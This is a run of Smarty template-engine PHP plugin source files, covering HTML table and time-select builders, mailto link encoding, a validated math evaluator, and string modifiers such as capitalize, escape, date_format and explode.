        $_html_seconds .= '</select>';
    }
    // generate meridian <select>
    if ($display_meridian && !$use_24_hours) {
        $_html_meridian = '';
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Meridian]') : ($prefix . 'Meridian');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($meridian_extra) {
            $_extra .= ' ' . $meridian_extra;
        }
        $_html_meridian = '<select name="' . $_name . '"';
        if ($meridian_id !== null || $all_id !== null) {
            $_html_meridian .= ' id="' . smarty_function_escape_special_chars(
                    $meridian_id !== null ?
                        ($meridian_id ? $meridian_id :
                            $_name) :
                        ($all_id ? ($all_id . $_name) :
                            $_name)
                ) . '"';
        }
        if ($meridian_size) {
            $_html_meridian .= ' size="' . $meridian_size . '"';
        }
        $_html_meridian .= $_extra . $extra_attrs . '>' . $option_separator;
        if (isset($meridian_empty) || isset($all_empty)) {
            $_html_meridian .= '<option value="">' . (isset($meridian_empty) ? $meridian_empty : $all_empty) .
                               '</option>' . $option_separator;
        }
        $_html_meridian .= '<option value="am"' . ($_hour > 0 && $_hour < 12 ? ' selected="selected"' : '') .
                           '>AM</option>' . $option_separator . '<option value="pm"' .
                           ($_hour < 12 ? '' : ' selected="selected"') . '>PM</option>' . $option_separator .
                           '</select>';
    }
    $_html = '';
    foreach (array(
        '_html_hours',
        '_html_minutes',
        '_html_seconds',
        '_html_meridian'
    ) as $k) {
        if (isset($$k)) {
            if ($_html) {
                $_html .= $field_separator;
            }
            $_html .= $$k;
        }
    }
    return $_html;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_table} function plugin
 * Type:     function
 * Name:     html_table
 * Date:     Feb 17, 2003
 * Purpose:  make an html table from an array of data
 * Params:
 *
 * - loop       - array to loop through
 * - cols       - number of columns, comma separated list of column names
 *                or array of column names
 * - rows       - number of rows
 * - table_attr - table attributes
 * - th_attr    - table heading attributes (arrays are cycled)
 * - tr_attr    - table row attributes (arrays are cycled)
 * - td_attr    - table cell attributes (arrays are cycled)
 * - trailpad   - value to pad trailing cells with
 * - caption    - text for caption element
 * - vdir       - vertical direction (default: "down", means top-to-bottom)
 * - hdir       - horizontal direction (default: "right", means left-to-right)
 * - inner      - inner loop (default "cols": print $loop line by line,
 *                $loop will be printed column by column otherwise)
 *
 * Examples:
 *
 * {table loop=$data}
 * {table loop=$data cols=4 tr_attr='"bgcolor=red"'}
 * {table loop=$data cols="first,second,third" tr_attr=$colors}
 *
 * @author  Monte Ohrt <monte at ohrt dot com>
 * @author  credit to Messju Mohr <messju at lammfellpuschen dot de>
 * @author  credit to boots <boots dot smarty at yahoo dot com>
 * @version 1.1
 * @link    https://www.smarty.net/manual/en/language.function.html.table.php {html_table}
 *           (Smarty online manual)
 *
 * @param array $params parameters
 *
 * @return string
 */
function smarty_function_html_table($params)
{
    $table_attr = 'border="1"';
    $tr_attr = '';
    $th_attr = '';
    $td_attr = '';
    $cols = $cols_count = 3;
    $rows = 3;
    $trailpad = '&nbsp;';
    $vdir = 'down';
    $hdir = 'right';
    $inner = 'cols';
    $caption = '';
    $loop = null;
    if (!isset($params[ 'loop' ])) {
        trigger_error("html_table: missing 'loop' parameter", E_USER_WARNING);
        return;
    }
    foreach ($params as $_key => $_value) {
        switch ($_key) {
            case 'loop':
                $$_key = (array)$_value;
                break;
            case 'cols':
                if (is_array($_value) && !empty($_value)) {
                    $cols = $_value;
                    $cols_count = count($_value);
                } elseif (!is_numeric($_value) && is_string($_value) && !empty($_value)) {
                    $cols = explode(',', $_value);
                    $cols_count = count($cols);
                } elseif (!empty($_value)) {
                    $cols_count = (int)$_value;
                } else {
                    $cols_count = $cols;
                }
                break;
            case 'rows':
                $$_key = (int)$_value;
                break;
            case 'table_attr':
            case 'trailpad':
            case 'hdir':
            case 'vdir':
            case 'inner':
            case 'caption':
                $$_key = (string)$_value;
                break;
            case 'tr_attr':
            case 'td_attr':
            case 'th_attr':
                $$_key = $_value;
                break;
        }
    }
    $loop_count = count($loop);
    if (empty($params[ 'rows' ])) {
        /* no rows specified */
        $rows = ceil($loop_count / $cols_count);
    } elseif (empty($params[ 'cols' ])) {
        if (!empty($params[ 'rows' ])) {
            /* no cols specified, but rows */
            $cols_count = ceil($loop_count / $rows);
        }
    }
    $output = "<table $table_attr>\n";
    if (!empty($caption)) {
        $output .= '<caption>' . $caption . "</caption>\n";
    }
    if (is_array($cols)) {
        $cols = ($hdir === 'right') ? $cols : array_reverse($cols);
        $output .= "<thead><tr>\n";
        for ($r = 0; $r < $cols_count; $r++) {
            $output .= '<th' . smarty_function_html_table_cycle('th', $th_attr, $r) . '>';
            $output .= $cols[ $r ];
            $output .= "</th>\n";
        }
        $output .= "</tr></thead>\n";
    }
    $output .= "<tbody>\n";
    for ($r = 0; $r < $rows; $r++) {
        $output .= "<tr" . smarty_function_html_table_cycle('tr', $tr_attr, $r) . ">\n";
        $rx = ($vdir === 'down') ? $r * $cols_count : ($rows - 1 - $r) * $cols_count;
        for ($c = 0; $c < $cols_count; $c++) {
            $x = ($hdir === 'right') ? $rx + $c : $rx + $cols_count - 1 - $c;
            if ($inner !== 'cols') {
                /* shuffle x to loop over rows*/
                $x = floor($x / $cols_count) + ($x % $cols_count) * $rows;
            }
            if ($x < $loop_count) {
                $output .= "<td" . smarty_function_html_table_cycle('td', $td_attr, $c) . ">" . $loop[ $x ] . "</td>\n";
            } else {
                $output .= "<td" . smarty_function_html_table_cycle('td', $td_attr, $c) . ">$trailpad</td>\n";
            }
        }
        $output .= "</tr>\n";
    }
    $output .= "</tbody>\n";
    $output .= "</table>\n";
    return $output;
}

/**
 * @param $name
 * @param $var
 * @param $no
 *
 * @return string
 */
function smarty_function_html_table_cycle($name, $var, $no)
{
    if (!is_array($var)) {
        $ret = $var;
    } else {
        $ret = $var[ $no % count($var) ];
    }
    return ($ret) ? ' ' . $ret : '';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {mailto} function plugin
 * Type:     function
 * Name:     mailto
 * Date:     May 21, 2002
 * Purpose:  automate mailto address link creation, and optionally encode them.
 * Params:
 *
 * - address    - (required) - e-mail address
 * - text       - (optional) - text to display, default is address
 * - encode     - (optional) - can be one of:
 *                             * none : no encoding (default)
 *                             * javascript : encode with javascript
 *                             * javascript_charcode : encode with javascript charcode
 *                             * hex : encode with hexadecimal (no javascript)
 * - cc         - (optional) - address(es) to carbon copy
 * - bcc        - (optional) - address(es) to blind carbon copy
 * - subject    - (optional) - e-mail subject
 * - newsgroups - (optional) - newsgroup(s) to post to
 * - followupto - (optional) - address(es) to follow up to
 * - extra      - (optional) - extra tags for the href link
 *
 * Examples:
 *
 * {mailto address="me@domain.com"}
 * {mailto address="me@domain.com" encode="javascript"}
 * {mailto address="me@domain.com" encode="hex"}
 * {mailto address="me@domain.com" subject="Hello to you!"}
 * {mailto address="me@domain.com" cc="you@domain.com,they@domain.com"}
 * {mailto address="me@domain.com" extra='class="mailto"'}
 *
 * @link    https://www.smarty.net/manual/en/language.function.mailto.php {mailto}
 *           (Smarty online manual)
 * @version 1.2
 * @author  Monte Ohrt <monte at ohrt dot com>
 * @author  credits to Jason Sweat (added cc, bcc and subject functionality)
 *
 * @param array $params parameters
 *
 * @return string
 */
function smarty_function_mailto($params)
{
    static $_allowed_encoding = [
        'javascript' => true,
        'javascript_charcode' => true,
        'hex' => true,
        'none' => true
    ];

    $extra = '';
    if (empty($params[ 'address' ])) {
        trigger_error("mailto: missing 'address' parameter", E_USER_WARNING);
        return;
    } else {
        $address = $params[ 'address' ];
    }

    $text = $address;

    // netscape and mozilla do not decode %40 (@) in BCC field (bug?)
    // so, don't encode it.
    $mail_parms = [];
    foreach ($params as $var => $value) {
        switch ($var) {
            case 'cc':
            case 'bcc':
            case 'followupto':
                if (!empty($value)) {
                    $mail_parms[] = $var . '=' . str_replace(['%40', '%2C'], ['@', ','], rawurlencode($value));
                }
                break;
            case 'subject':
            case 'newsgroups':
                $mail_parms[] = $var . '=' . rawurlencode($value);
                break;
            case 'extra':
            case 'text':
                $$var = $value;
            // no break
            default:
        }
    }

    if ($mail_parms) {
        $address .= '?' . join('&', $mail_parms);
    }
    $encode = (empty($params[ 'encode' ])) ? 'none' : $params[ 'encode' ];
    if (!isset($_allowed_encoding[ $encode ])) {
        trigger_error(
            "mailto: 'encode' parameter must be none, javascript, javascript_charcode or hex",
            E_USER_WARNING
        );
        return;
    }

    $string = '<a href="mailto:' . htmlspecialchars($address, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, Smarty::$_CHARSET) .
        '" ' . $extra . '>' . htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, Smarty::$_CHARSET) . '</a>';

    if ($encode === 'javascript') {
        $js_encode = '';
        for ($x = 0, $_length = strlen($string); $x < $_length; $x++) {
            $js_encode .= '%' . bin2hex($string[ $x ]);
        }
        return '<script type="text/javascript">document.write(unescape(\'' . $js_encode . '\'))</script>';
    } elseif ($encode === 'javascript_charcode') {
        for ($x = 0, $_length = strlen($string); $x < $_length; $x++) {
            $ord[] = ord($string[ $x ]);
        }
        return '<script type="text/javascript">document.write(String.fromCharCode(' . implode(',', $ord) . '))</script>';
    } elseif ($encode === 'hex') {
        preg_match('!^(.*)(\?.*)$!', $address, $match);
        if (!empty($match[ 2 ])) {
            trigger_error("mailto: hex encoding does not work with extra attributes. Try javascript.", E_USER_WARNING);
            return;
        }
        $address_encode = '';
        for ($x = 0, $_length = strlen($address); $x < $_length; $x++) {
            if (preg_match('!\w!' . Smarty::$_UTF8_MODIFIER, $address[ $x ])) {
                $address_encode .= '%' . bin2hex($address[ $x ]);
            } else {
                $address_encode .= $address[ $x ];
            }
        }
        $text_encode = '';
        for ($x = 0, $_length = strlen($text); $x < $_length; $x++) {
            $text_encode .= '&#x' . bin2hex($text[ $x ]) . ';';
        }
        $mailto = "&#109;&#97;&#105;&#108;&#116;&#111;&#58;";
        return '<a href="' . $mailto . $address_encode . '" ' . $extra . '>' . $text_encode . '</a>';
    } else {
        // no encoding
        return $string;
    }
}
<?php
/**
 * Smarty plugin
 * This plugin is only for Smarty2 BC
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {math} function plugin
 * Type:     function
 * Name:     math
 * Purpose:  handle math computations in template
 *
 * @link   https://www.smarty.net/manual/en/language.function.math.php {math}
 *           (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @return string|null
 */
function smarty_function_math($params, $template)
{
    static $_allowed_funcs =
        array(
            'int'   => true,
            'abs'   => true,
            'ceil'  => true,
            'acos'   => true,
            'acosh'   => true,
            'cos'   => true,
            'cosh'   => true,
            'deg2rad'   => true,
            'rad2deg'   => true,
            'exp'   => true,
            'floor' => true,
            'log'   => true,
            'log10' => true,
            'max'   => true,
            'min'   => true,
            'pi'    => true,
            'pow'   => true,
            'rand'  => true,
            'round' => true,
            'asin'   => true,
            'asinh'   => true,
            'sin'   => true,
            'sinh'   => true,
            'sqrt'  => true,
            'srand' => true,
            'atan'   => true,
            'atanh'   => true,
            'tan'   => true,
            'tanh'   => true
        );

    // be sure equation parameter is present
    if (empty($params[ 'equation' ])) {
        trigger_error("math: missing equation parameter", E_USER_WARNING);
        return;
    }
    $equation = $params[ 'equation' ];

    // Remove whitespaces
    $equation = preg_replace('/\s+/', '', $equation);

    // Adapted from https://www.php.net/manual/en/function.eval.php#107377
    $number = '-?(?:\d+(?:[,.]\d+)?|pi|π)'; // What is a number
    $functionsOrVars = '((?:0x[a-fA-F0-9]+)|([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*))';
    $operators = '[,+\/*\^%-]'; // Allowed math operators
    $regexp = '/^(('.$number.'|'.$functionsOrVars.'|('.$functionsOrVars.'\s*\((?1)*\)|\((?1)*\)))(?:'.$operators.'(?1))?)+$/';

    if (!preg_match($regexp, $equation)) {
        trigger_error("math: illegal characters", E_USER_WARNING);
        return;
    }

    // make sure parenthesis are balanced
    if (substr_count($equation, '(') !== substr_count($equation, ')')) {
        trigger_error("math: unbalanced parenthesis", E_USER_WARNING);
        return;
    }

    // disallow backticks
    if (strpos($equation, '`') !== false) {
        trigger_error("math: backtick character not allowed in equation", E_USER_WARNING);
        return;
    }

    // also disallow dollar signs
    if (strpos($equation, '$') !== false) {
        trigger_error("math: dollar signs not allowed in equation", E_USER_WARNING);
        return;
    }
    foreach ($params as $key => $val) {
        if ($key !== 'equation' && $key !== 'format' && $key !== 'assign') {
            // make sure value is not empty
            if (strlen($val) === 0) {
                trigger_error("math: parameter '{$key}' is empty", E_USER_WARNING);
                return;
            }
            if (!is_numeric($val)) {
                trigger_error("math: parameter '{$key}' is not numeric", E_USER_WARNING);
                return;
            }
        }
    }
    // match all vars in equation, make sure all are passed
    preg_match_all('!(?:0x[a-fA-F0-9]+)|([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)!', $equation, $match);
    foreach ($match[ 1 ] as $curr_var) {
        if ($curr_var && !isset($params[ $curr_var ]) && !isset($_allowed_funcs[ $curr_var ])) {
            trigger_error(
                "math: function call '{$curr_var}' not allowed, or missing parameter '{$curr_var}'",
                E_USER_WARNING
            );
            return;
        }
    }
    foreach ($params as $key => $val) {
        if ($key !== 'equation' && $key !== 'format' && $key !== 'assign') {
            $equation = preg_replace("/\b$key\b/", " \$params['$key'] ", $equation);
        }
    }
    $smarty_math_result = null;
    eval("\$smarty_math_result = " . $equation . ";");

    if (empty($params[ 'format' ])) {
        if (empty($params[ 'assign' ])) {
            return $smarty_math_result;
        } else {
            $template->assign($params[ 'assign' ], $smarty_math_result);
        }
    } else {
        if (empty($params[ 'assign' ])) {
            printf($params[ 'format' ], $smarty_math_result);
        } else {
            $template->assign($params[ 'assign' ], sprintf($params[ 'format' ], $smarty_math_result));
        }
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty capitalize modifier plugin
 * Type:     modifier
 * Name:     capitalize
 * Purpose:  capitalize words in the string
 * {@internal {$string|capitalize:true:true} is the fastest option for MBString enabled systems }}
 *
 * @param string  $string    string to capitalize
 * @param boolean $uc_digits also capitalize "x123" to "X123"
 * @param boolean $lc_rest   capitalize first letters, lowercase all following letters "aAa" to "Aaa"
 *
 * @return string capitalized string
 * @author Monte Ohrt <monte at ohrt dot com>
 * @author Rodney Rehm
 */
function smarty_modifier_capitalize($string, $uc_digits = false, $lc_rest = false)
{
    $string = (string) $string;

    if (Smarty::$_MBSTRING) {
        if ($lc_rest) {
            // uppercase (including hyphenated words)
            $upper_string = mb_convert_case($string, MB_CASE_TITLE, Smarty::$_CHARSET);
        } else {
            // uppercase word breaks
            $upper_string = preg_replace_callback(
                "!(^|[^\p{L}'])([\p{Ll}])!S" . Smarty::$_UTF8_MODIFIER,
                'smarty_mod_cap_mbconvert_cb',
                $string
            );
        }
        // check uc_digits case
        if (!$uc_digits) {
            if (preg_match_all(
                "!\b([\p{L}]*[\p{N}]+[\p{L}]*)\b!" . Smarty::$_UTF8_MODIFIER,
                $string,
                $matches,
                PREG_OFFSET_CAPTURE
            )
            ) {
                foreach ($matches[ 1 ] as $match) {
                    $upper_string =
                        substr_replace(
                            $upper_string,
                            mb_strtolower($match[ 0 ], Smarty::$_CHARSET),
                            $match[ 1 ],
                            strlen($match[ 0 ])
                        );
                }
            }
        }
        $upper_string =
            preg_replace_callback(
                "!((^|\s)['\"])(\w)!" . Smarty::$_UTF8_MODIFIER,
                'smarty_mod_cap_mbconvert2_cb',
                $upper_string
            );
        return $upper_string;
    }
    // lowercase first
    if ($lc_rest) {
        $string = strtolower($string);
    }
    // uppercase (including hyphenated words)
    $upper_string =
        preg_replace_callback(
            "!(^|[^\p{L}'])([\p{Ll}])!S" . Smarty::$_UTF8_MODIFIER,
            'smarty_mod_cap_ucfirst_cb',
            $string
        );
    // check uc_digits case
    if (!$uc_digits) {
        if (preg_match_all(
            "!\b([\p{L}]*[\p{N}]+[\p{L}]*)\b!" . Smarty::$_UTF8_MODIFIER,
            $string,
            $matches,
            PREG_OFFSET_CAPTURE
        )
        ) {
            foreach ($matches[ 1 ] as $match) {
                $upper_string =
                    substr_replace($upper_string, strtolower($match[ 0 ]), $match[ 1 ], strlen($match[ 0 ]));
            }
        }
    }
    $upper_string = preg_replace_callback(
        "!((^|\s)['\"])(\w)!" . Smarty::$_UTF8_MODIFIER,
        'smarty_mod_cap_ucfirst2_cb',
        $upper_string
    );
    return $upper_string;
}

/**
 *
 * Bug: create_function() use exhausts memory when used in long loops
 * Fix: use declared functions for callbacks instead of using create_function()
 * Note: This can be fixed using anonymous functions instead, but that requires PHP >= 5.3
 *
 * @author Kyle Renfrow
 */
/**
 * @param $matches
 *
 * @return string
 */
function smarty_mod_cap_mbconvert_cb($matches)
{
    return stripslashes($matches[ 1 ]) . mb_convert_case(stripslashes($matches[ 2 ]), MB_CASE_UPPER, Smarty::$_CHARSET);
}

/**
 * @param $matches
 *
 * @return string
 */
function smarty_mod_cap_mbconvert2_cb($matches)
{
    return stripslashes($matches[ 1 ]) . mb_convert_case(stripslashes($matches[ 3 ]), MB_CASE_UPPER, Smarty::$_CHARSET);
}

/**
 * @param $matches
 *
 * @return string
 */
function smarty_mod_cap_ucfirst_cb($matches)
{
    return stripslashes($matches[ 1 ]) . ucfirst(stripslashes($matches[ 2 ]));
}

/**
 * @param $matches
 *
 * @return string
 */
function smarty_mod_cap_ucfirst2_cb($matches)
{
    return stripslashes($matches[ 1 ]) . ucfirst(stripslashes($matches[ 3 ]));
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty count modifier plugin
 * Type:     modifier
 * Name:     count
 * Purpose:  counts all elements in an array or in a Countable object
 * Input:
 *          - Countable|array: array or object to count
 *          - mode: int defaults to 0 for normal count mode, if set to 1 counts recursive
  *
 * @param mixed $arrayOrObject  input array/object
 * @param int $mode       count mode
 *
 * @return int
 */
function smarty_modifier_count($arrayOrObject, $mode = 0)
{
    /*
     * @see https://www.php.net/count
     * > Prior to PHP 8.0.0, if the parameter was neither an array nor an object that implements the Countable interface,
     * > 1 would be returned, unless value was null, in which case 0 would be returned.
     */

    if ($arrayOrObject instanceof Countable || is_array($arrayOrObject)) {
        return count($arrayOrObject, (int) $mode);
    } elseif ($arrayOrObject === null) {
        return 0;
    }
    return 1;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty date_format modifier plugin
 * Type:     modifier
 * Name:     date_format
 * Purpose:  format datestamps via strftime
 * Input:
 *          - string: input date string
 *          - format: strftime format for output
 *          - default_date: default date if $string is empty
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.date.format.php date_format (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string $string       input date string
 * @param string $format       strftime format for output
 * @param string $default_date default date if $string is empty
 * @param string $formatter    either 'strftime' or 'auto'
 *
 * @return string |void
 * @uses   smarty_make_timestamp()
 */
function smarty_modifier_date_format($string, $format = null, $default_date = '', $formatter = 'auto')
{
    if ($format === null) {
        $format = Smarty::$_DATE_FORMAT;
    }
    /**
     * require_once the {@link shared.make_timestamp.php} plugin
     */
    static $is_loaded = false;
    if (!$is_loaded) {
        if (!is_callable('smarty_make_timestamp')) {
            include_once SMARTY_PLUGINS_DIR . 'shared.make_timestamp.php';
        }
        $is_loaded = true;
    }
    if (!empty($string) && $string !== '0000-00-00' && $string !== '0000-00-00 00:00:00') {
        $timestamp = smarty_make_timestamp($string);
    } elseif (!empty($default_date)) {
        $timestamp = smarty_make_timestamp($default_date);
    } else {
        return;
    }
    if ($formatter === 'strftime' || ($formatter === 'auto' && strpos($format, '%') !== false)) {
        if (Smarty::$_IS_WINDOWS) {
            $_win_from = array(
                '%D',
                '%h',
                '%n',
                '%r',
                '%R',
                '%t',
                '%T'
            );
            $_win_to = array(
                '%m/%d/%y',
                '%b',
                "\n",
                '%I:%M:%S %p',
                '%H:%M',
                "\t",
                '%H:%M:%S'
            );
            if (strpos($format, '%e') !== false) {
                $_win_from[] = '%e';
                $_win_to[] = sprintf('%\' 2d', date('j', $timestamp));
            }
            if (strpos($format, '%l') !== false) {
                $_win_from[] = '%l';
                $_win_to[] = sprintf('%\' 2d', date('h', $timestamp));
            }
            $format = str_replace($_win_from, $_win_to, $format);
        }
        // @ to suppress deprecation errors when running in PHP8.1 or higher.
        return @strftime($format, $timestamp);
    } else {
        return date($format, $timestamp);
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage Debug
 */
/**
 * Smarty debug_print_var modifier plugin
 * Type:     modifier
 * Name:     debug_print_var
 * Purpose:  formats variable contents for display in the console
 *
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param array|object $var     variable to be formatted
 * @param int          $max     maximum recursion depth if $var is an array or object
 * @param int          $length  maximum string length if $var is a string
 * @param int          $depth   actual recursion depth
 * @param array        $objects processed objects in actual depth to prevent recursive object processing
 *
 * @return string
 */
function smarty_modifier_debug_print_var($var, $max = 10, $length = 40, $depth = 0, $objects = array())
{
    $_replace = array("\n" => '\n', "\r" => '\r', "\t" => '\t');
    switch (gettype($var)) {
        case 'array':
            $results = '<b>Array (' . count($var) . ')</b>';
            if ($depth === $max) {
                break;
            }
            foreach ($var as $curr_key => $curr_val) {
                $results .= '<br>' . str_repeat('&nbsp;', $depth * 2) . '<b>' . strtr($curr_key, $_replace) .
                            '</b> =&gt; ' .
                            smarty_modifier_debug_print_var($curr_val, $max, $length, ++$depth, $objects);
                $depth--;
            }
            break;
        case 'object':
            $object_vars = get_object_vars($var);
            $results = '<b>' . get_class($var) . ' Object (' . count($object_vars) . ')</b>';
            if (in_array($var, $objects)) {
                $results .= ' called recursive';
                break;
            }
            if ($depth === $max) {
                break;
            }
            $objects[] = $var;
            foreach ($object_vars as $curr_key => $curr_val) {
                $results .= '<br>' . str_repeat('&nbsp;', $depth * 2) . '<b> -&gt;' . strtr($curr_key, $_replace) .
                            '</b> = ' . smarty_modifier_debug_print_var($curr_val, $max, $length, ++$depth, $objects);
                $depth--;
            }
            break;
        case 'boolean':
        case 'NULL':
        case 'resource':
            if (true === $var) {
                $results = 'true';
            } elseif (false === $var) {
                $results = 'false';
            } elseif (null === $var) {
                $results = 'null';
            } else {
                $results = htmlspecialchars((string)$var);
            }
            $results = '<i>' . $results . '</i>';
            break;
        case 'integer':
        case 'float':
            $results = htmlspecialchars((string)$var);
            break;
        case 'string':
            $results = strtr($var, $_replace);
            if (Smarty::$_MBSTRING) {
                if (mb_strlen($var, Smarty::$_CHARSET) > $length) {
                    $results = mb_substr($var, 0, $length - 3, Smarty::$_CHARSET) . '...';
                }
            } else {
                if (isset($var[ $length ])) {
                    $results = substr($var, 0, $length - 3) . '...';
                }
            }
            $results = htmlspecialchars('"' . $results . '"', ENT_QUOTES, Smarty::$_CHARSET);
            break;
        case 'unknown type':
        default:
            $results = strtr((string)$var, $_replace);
            if (Smarty::$_MBSTRING) {
                if (mb_strlen($results, Smarty::$_CHARSET) > $length) {
                    $results = mb_substr($results, 0, $length - 3, Smarty::$_CHARSET) . '...';
                }
            } else {
                if (strlen($results) > $length) {
                    $results = substr($results, 0, $length - 3) . '...';
                }
            }
            $results = htmlspecialchars($results, ENT_QUOTES, Smarty::$_CHARSET);
    }
    return $results;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty escape modifier plugin
 * Type:     modifier
 * Name:     escape
 * Purpose:  escape string for output
 *
 * @link   https://www.smarty.net/docs/en/language.modifier.escape
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string  $string        input string
 * @param string  $esc_type      escape type
 * @param string  $char_set      character set, used for htmlspecialchars() or htmlentities()
 * @param boolean $double_encode encode already encoded entitites again, used for htmlspecialchars() or htmlentities()
 *
 * @return string escaped input string
 */
function smarty_modifier_escape($string, $esc_type = 'html', $char_set = null, $double_encode = true)
{
    static $is_loaded_1 = false;
    static $is_loaded_2 = false;
    if (!$char_set) {
        $char_set = Smarty::$_CHARSET;
    }

    $string = (string)$string;

    switch ($esc_type) {
        case 'html':
            return htmlspecialchars($string, ENT_QUOTES, $char_set, $double_encode);
        // no break
        case 'htmlall':
            if (Smarty::$_MBSTRING) {
                $string = mb_convert_encoding($string, 'UTF-8', $char_set);
                return htmlentities($string, ENT_QUOTES, 'UTF-8', $double_encode);
            }
            // no MBString fallback
            return htmlentities($string, ENT_QUOTES, $char_set, $double_encode);
        // no break
        case 'url':
            return rawurlencode($string);
        case 'urlpathinfo':
            return str_replace('%2F', '/', rawurlencode($string));
        case 'quotes':
            // escape unescaped single quotes
            return preg_replace("%(?<!\\\\)'%", "\\'", $string);
        case 'hex':
            // escape every byte into hex
            // Note that the UTF-8 encoded character ä will be represented as %c3%a4
            $return = '';
            $_length = strlen($string);
            for ($x = 0; $x < $_length; $x++) {
                $return .= '%' . bin2hex($string[ $x ]);
            }
            return $return;
        case 'hexentity':
            $return = '';
            if (Smarty::$_MBSTRING) {
                if (!$is_loaded_1) {
                    if (!is_callable('smarty_mb_to_unicode')) {
                        include_once SMARTY_PLUGINS_DIR . 'shared.mb_unicode.php';
                    }
                    $is_loaded_1 = true;
                }
                $return = '';
                foreach (smarty_mb_to_unicode($string, Smarty::$_CHARSET) as $unicode) {
                    $return .= '&#x' . strtoupper(dechex($unicode)) . ';';
                }
                return $return;
            }
            // no MBString fallback
            $_length = strlen($string);
            for ($x = 0; $x < $_length; $x++) {
                $return .= '&#x' . bin2hex($string[ $x ]) . ';';
            }
            return $return;
        case 'decentity':
            $return = '';
            if (Smarty::$_MBSTRING) {
                if (!$is_loaded_1) {
                    if (!is_callable('smarty_mb_to_unicode')) {
                        include_once SMARTY_PLUGINS_DIR . 'shared.mb_unicode.php';
                    }
                    $is_loaded_1 = true;
                }
                $return = '';
                foreach (smarty_mb_to_unicode($string, Smarty::$_CHARSET) as $unicode) {
                    $return .= '&#' . $unicode . ';';
                }
                return $return;
            }
            // no MBString fallback
            $_length = strlen($string);
            for ($x = 0; $x < $_length; $x++) {
                $return .= '&#' . ord($string[ $x ]) . ';';
            }
            return $return;
        case 'javascript':
            // escape quotes and backslashes, newlines, etc.
            return strtr(
                $string,
                array(
                    '\\' => '\\\\',
                    "'"  => "\\'",
                    '"'  => '\\"',
                    "\r" => '\\r',
                    "\n" => '\\n',
                    '</' => '<\/',
                    // see https://html.spec.whatwg.org/multipage/scripting.html#restrictions-for-contents-of-script-elements
                    '<!--' => '<\!--',
                    '<s'   => '<\s',
                    '<S'   => '<\S',
	                "`" => "\\\\`",
	                "\${" => "\\\\\\$\\{"
                )
            );
        case 'mail':
            if (Smarty::$_MBSTRING) {
                if (!$is_loaded_2) {
                    if (!is_callable('smarty_mb_str_replace')) {
                        include_once SMARTY_PLUGINS_DIR . 'shared.mb_str_replace.php';
                    }
                    $is_loaded_2 = true;
                }
                return smarty_mb_str_replace(
                    array(
                        '@',
                        '.'
                    ),
                    array(
                        ' [AT] ',
                        ' [DOT] '
                    ),
                    $string
                );
            }
            // no MBString fallback
            return str_replace(
                array(
                    '@',
                    '.'
                ),
                array(
                    ' [AT] ',
                    ' [DOT] '
                ),
                $string
            );
        case 'nonstd':
            // escape non-standard chars, such as ms document quotes
            $return = '';
            if (Smarty::$_MBSTRING) {
                if (!$is_loaded_1) {
                    if (!is_callable('smarty_mb_to_unicode')) {
                        include_once SMARTY_PLUGINS_DIR . 'shared.mb_unicode.php';
                    }
                    $is_loaded_1 = true;
                }
                foreach (smarty_mb_to_unicode($string, Smarty::$_CHARSET) as $unicode) {
                    if ($unicode >= 126) {
                        $return .= '&#' . $unicode . ';';
                    } else {
                        $return .= chr($unicode);
                    }
                }
                return $return;
            }
            $_length = strlen($string);
            for ($_i = 0; $_i < $_length; $_i++) {
                $_ord = ord(substr($string, $_i, 1));
                // non-standard char, escape it
                if ($_ord >= 126) {
                    $return .= '&#' . $_ord . ';';
                } else {
                    $return .= substr($string, $_i, 1);
                }
            }
            return $return;
        default:
            trigger_error("escape: unsupported type: $esc_type - returning unmodified string", E_USER_NOTICE);
            return $string;
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */

/**
 * Smarty explode modifier plugin
 * Type:     modifier
 * Name:     explode
 * Purpose:  split a string by a string
 *
 * @param string   $separator
 * @param string   $string
 * @param int|null $limit
 *
 * @return array
 */
function smarty_modifier_explode($separator, $string, ?int $limit = null)
{
    // provide $string default to prevent deprecation errors in PHP >=8.1
    return explode($separator, $string ?? '', $limit ?? PHP_INT_MAX);
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */

function smarty_modifier_implode($values, $separator = '')
{
	if (is_array($separator)) {
		return implode((string) ($values ?? ''), (array) $separator);
	}
	return implode((string) ($separator ?? ''), (array) $values);
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty wordwrap modifier plugin
 * Type:     modifier
 * Name:     mb_wordwrap
 * Purpose:  Wrap a string to a given number of characters
 *
 * @link   https://php.net/manual/en/function.wordwrap.php for similarity
 *
 * @param string  $str   the string to wrap
 * @param int     $width the width of the output
 * @param string  $break the character used to break the line
 * @param boolean $cut   ignored parameter, just for the sake of
 *
 * @return string  wrapped string
 * @author Rodney Rehm
 */
